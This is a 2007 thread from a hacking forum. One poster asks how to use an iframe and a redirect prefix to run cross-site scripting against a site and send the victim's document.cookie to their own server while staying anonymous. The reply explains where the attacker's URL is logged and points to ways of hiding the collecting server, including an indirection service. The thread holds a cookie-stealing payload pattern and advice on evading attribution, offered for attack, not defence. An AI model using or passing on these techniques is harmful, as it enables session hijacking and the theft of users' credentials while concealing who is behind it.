Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Who's got it? Who's giving it away? How to protect your privacy and steal it from other people. For intellectual privacy, personal privacy, and blackhats alike... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Using redirect prefixes for iframe hacks
Date: May 30, 2007 05:41PM

Suppose I use
<iframe src="http://REDIRECTurlPREFIX.net?url=http://siteTOhack.org?injVar=attackParameters">
on my server and the attack parameters send a cookie to my server with a regular
http://site/com?c=document.cookie
Is my server's IP or URL logged? If so, how can I be anonymous?
Thanks.



Edited 1 time(s). Last edit at 05/30/2007 06:51PM by digitalIllusionism.

Options: ReplyQuote
Re: Using redirect prefixes for iframe hacks
Posted by: kuza55
Date: May 31, 2007 01:00AM

By the client?

Yes, it is; in that it is probably in the user's cache/browsing history. Does this matter? Not really; anyone who is looking for it can find it without needing to see it in the cache/browsing history.

You could try using something like http://www.dapper.net/ but that's just an extra level of indirection.

By the sever?

It usually is, depending on how you execute your attack, but it doesn't have to be, for more info read these two posts:

[kuza55.blogspot.com]
[kuza55.blogspot.com]

The second post is probably much more useful for you though, but you might want to read the first one, since its a different (but less optimal) solution.

So while you can hide things from the XSSed server, a user who is trying to find your server will (with enough skill) always be able to find it.

Options: ReplyQuote


Sorry, only registered users may post in this forum.